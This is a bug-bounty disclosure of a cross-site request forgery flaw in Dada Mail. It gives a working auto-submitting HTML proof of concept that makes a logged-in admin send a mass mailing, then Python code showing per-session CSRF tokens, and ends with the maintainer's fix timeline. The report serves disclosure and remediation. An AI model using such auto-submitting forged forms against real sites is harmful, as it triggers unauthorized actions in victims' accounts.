Cross-Site Request Forgery (CSRF) in justingit/dada-mail

Valid

Reported on Sep 12th 2021


✍️ Description

An attacker is able to send any mass mailing via a CSRF attack.

In a CSRF attack, a user who is logged into your application only has to visit a malicious website; with a single redirection the attacker can then perform a request against an unprotected endpoint. This means that merely visiting a site causes an unwanted action to be performed, without the user being aware of it.

Alternatively, a user with low privileges can send a link to other users or admins with higher privileges, and their malicious request will be executed without the victim users or admins being aware of it.

🕵️‍♂️ Proof of Concept

1. First, an admin or a user with the right privileges must already be logged in to the application in a browser.

2. Open PoC.html (it auto-submits).

3. A mass mailing with preheader aaa and content bbb will be sent once the PoC.html file is opened.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dadademo.com/cgi-bin/dada/mail.cgi" method="POST">
      <input type="hidden" name="list" value="demolist" />
      <input type="hidden" name="sched&#95;flavor" value="" />
      <input type="hidden" name="flavor" value="send&#95;email" />
      <input type="hidden" name="support&#95;files&#95;url" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files" />
      <input type="hidden" name="draft&#95;alert" value="0" />
      <input type="hidden" name="draft&#95;id" value="441" />
      <input type="hidden" name="save&#95;draft&#95;role" value="draft" />
      <input type="hidden" name="draft&#95;role" value="draft" />
      <input type="hidden" name="schedule&#95;html&#95;body&#95;checksum" value="" />
      <input type="hidden" name="feed&#95;url&#95;most&#95;recent&#95;entry" value="" />
      <input type="hidden" name="schedule&#95;type" value="single" />
      <input type="hidden" name="schedule&#95;single&#95;displaydatetime" value="" />
      <input type="hidden" name="schedule&#95;recurring&#95;displaydatetime&#95;start" value="" />
      <input type="hidden" name="schedule&#95;recurring&#95;displaydatetime&#95;end" value="" />
      <input type="hidden" name="schedule&#95;recurring&#95;display&#95;hms" value="00&#58;00" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="1" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="2" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="3" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="4" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="5" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="6" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="7" />
      <input type="hidden" name="schedule&#95;recurring&#95;only&#95;mass&#95;mail&#95;if&#95;primary&#95;diff" value="1" />
      <input type="hidden" name="Reply&#45;To" value="" />
      <input type="hidden" name="X&#45;Priority" value="3" />
      <input type="hidden" name="Subject" value="&lt;&#33;&#45;&#45;&#32;tmpl&#95;var&#32;list&#95;settings&#46;list&#95;name&#32;&#45;&#45;&gt;&#32;Message" />
      <input type="hidden" name="X&#45;Preheader" value="aaa" />
      <input type="hidden" name="content&#95;from" value="content&#95;from&#95;textarea" />
      <input type="hidden" name="html&#95;message&#95;body" value="&lt;html&gt;&#13;&#10;&lt;head&gt;&#13;&#10;&#9;&lt;title&gt;&lt;&#47;title&gt;&#13;&#10;&lt;&#47;head&gt;&#13;&#10;&lt;body&gt;&#13;&#10;&lt;p&gt;aaa&lt;&#47;p&gt;&#13;&#10;&lt;&#47;body&gt;&#13;&#10;&lt;&#47;html&gt;&#13;&#10;" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="crop&#95;html&#95;content&#95;selector&#95;type" value="id" />
      <input type="hidden" name="crop&#95;html&#95;content&#95;selector&#95;label" value="" />
      <input type="hidden" name="feed&#95;url" value="" />
      <input type="hidden" name="feed&#95;url&#95;content&#95;type" value="summary" />
      <input type="hidden" name="feed&#95;url&#95;max&#95;entries" value="5" />
      <input type="hidden" name="feed&#95;url&#95;pre&#95;html" value="" />
      <input type="hidden" name="feed&#95;url&#95;post&#95;html" value="" />
      <input type="hidden" name="text&#95;message&#95;body" value="" />
      <input type="hidden" name="plaintext&#95;url" value="" />
      <input type="hidden" name="plaintext&#95;content&#95;from" value="auto" />
      <input type="hidden" name="rich&#95;filemanager&#95;enabled" value="1" />
      <input type="hidden" name="rich&#95;filemanager&#95;url" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files&#47;RichFilemanager" />
      <input type="hidden" name="rich&#95;filemanager&#95;upload&#95;dir" value="&#47;home8&#47;dadademo&#47;public&#95;html&#47;dada&#95;mail&#95;support&#95;files&#47;file&#95;uploads" />
      <input type="hidden" name="rich&#95;filemanager&#95;upload&#95;url" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files&#47;file&#95;uploads" />
      <input type="hidden" name="SUPPORT&#95;FILES&#95;URL" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files" />
      <input type="hidden" name="attachment1" value="" />
      <input type="hidden" name="attachment2" value="" />
      <input type="hidden" name="attachment3" value="" />
      <input type="hidden" name="attachment4" value="" />
      <input type="hidden" name="attachment5" value="" />
      <input type="hidden" name="layout" value="default" />
      <input type="hidden" name="local&#95;archive&#95;options&#95;present" value="1" />
      <input type="hidden" name="archive&#95;message" value="1" />
      <input type="hidden" name="backdate&#95;datetime" value="2021&#45;09&#45;12&#32;22&#58;37&#58;41" />
      <input type="hidden" name="email&#46;operator" value="LIKE" />
      <input type="hidden" name="email&#46;value" value="" />
      <input type="hidden" name="subscriber&#46;timestamp&#46;rangestart" value="" />
      <input type="hidden" name="subscriber&#46;timestamp&#46;rangeend" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;domains" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;source" value="Pro&#32;Dada" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;medium" value="email" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;term" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;content" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;name" value="" />
      <input type="hidden" name="test&#95;recipient&#95;type" value="from&#95;textbox" />
      <input type="hidden" name="test&#95;recipients" value="" />
      <input type="hidden" name="process" value="save&#95;as&#95;draft" />
      <input type="hidden" name="json" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

This PoC performs the attack without the user noticing. The PoC can also send multiple requests at the same time, which means an attacker can brute-force all possible actions (using multiple iframes).

💥 Impact

This vulnerability is capable of causing medium damage to the availability and integrity of the system.

Fix

You should set a CSRF token for each user/form and verify it on every state-changing request.
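The fix above asks for a per-user, per-form CSRF token. The following is an added illustration of how such a token is issued and checked; it is not Dada Mail's own code (which is Perl) and makes no claim about the project's fix branch. The Session class, the csrf_token field name, the handler and the render_send_form helper are hypothetical, and the forged request is a constructed sample that mirrors only the list, flavor and process field names from the PoC on this page.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional, Tuple


# Hypothetical session object: in a real application it would be looked up
# from the login cookie that the browser attaches to every request,
# cross-site POSTs included.
@dataclass
class Session:
    session_id: str
    # Per-session secret used to derive CSRF tokens; never sent to the client.
    csrf_secret: bytes = field(default_factory=lambda: secrets.token_bytes(32))


def issue_csrf_token(session: Session, form_name: str) -> str:
    """Derive the token embedded in a form as a hidden field.

    HMAC over the form name with a per-session secret binds the token to both
    this session and this form: a token leaked from one form cannot be replayed
    against another, and one user's token is useless in another user's session.
    """
    return hmac.new(session.csrf_secret, form_name.encode("utf-8"),
                    hashlib.sha256).hexdigest()


def verify_csrf_token(session: Session, form_name: str,
                      presented: Optional[str]) -> bool:
    """Constant-time check of the token a POST carries against the expected one."""
    if not presented:
        return False
    expected = issue_csrf_token(session, form_name)
    return hmac.compare_digest(expected, presented)


def handle_send_email(session: Session, form: dict) -> dict:
    """Model of the state-changing 'send_email' handler with the token check in front.

    The login cookie alone cannot distinguish a forged cross-site POST from a
    genuine one, so the decision rests on the hidden token, which an attacker's
    page cannot read.
    """
    if not verify_csrf_token(session, "send_email", form.get("csrf_token")):
        return {"status": 403, "sent": False,
                "reason": "missing or invalid CSRF token"}
    return {"status": 200, "sent": True, "list": form.get("list")}


def render_send_form(session: Session) -> str:
    """The form as the application itself would render it for a logged-in user,
    carrying the hidden token that a forged copy cannot reproduce."""
    token = issue_csrf_token(session, "send_email")
    return (
        '<form action="/cgi-bin/dada/mail.cgi" method="POST">\n'
        '  <input type="hidden" name="flavor" value="send_email" />\n'
        f'  <input type="hidden" name="csrf_token" value="{token}" />\n'
        '</form>'
    )


# Constructed sample: the fields a forged cross-site form would submit. The
# attacker's page has no access to the victim's session secret, so it cannot
# include a valid csrf_token.
FORGED_REQUEST = {"list": "demolist", "flavor": "send_email",
                  "process": "save_as_draft"}


def legitimate_request(session: Session) -> dict:
    """Same fields submitted from the application's own form, token included."""
    return dict(FORGED_REQUEST,
                csrf_token=issue_csrf_token(session, "send_email"))


def demo() -> Tuple[bool, bool, bool]:
    """Returns (forged rejected, legitimate accepted, cross-session token rejected)."""
    victim = Session("victim-session")
    attacker = Session("attacker-session")
    forged = handle_send_email(victim, FORGED_REQUEST)
    legit = handle_send_email(victim, legitimate_request(victim))
    # A token the attacker obtained from their own session is still rejected
    # when presented in the victim's session.
    replay = handle_send_email(victim, legitimate_request(attacker))
    return (not forged["sent"], legit["sent"], not replay["sent"])


if __name__ == "__main__":
    print(render_send_form(Session("victim-session")))
    print(demo())  # (True, True, True)
```

The check has to sit in front of every handler that changes state (sending, scheduling, saving drafts), not only the one shown; a token validated on some endpoints and skipped on others leaves the skipped ones exposed exactly as before. Marking the login cookie SameSite=Lax or Strict is a useful second layer, but it is not a substitute for the token, since it depends on browser support and on no cross-site path legitimately needing the cookie.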

We have contacted a member of the justingit/dada-mail team and are waiting to hear back 2 months ago
Justin J validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Justin J (Maintainer), 2 months ago:

All CSRF vulnerabilities are fixed in the following branch, which will be merged into master soon: https://github.com/justingit/dada-mail/tree/features-csrf

Justin J confirmed that a fix has been merged on e9fc1c 2 months ago
Justin J has been awarded the fix bounty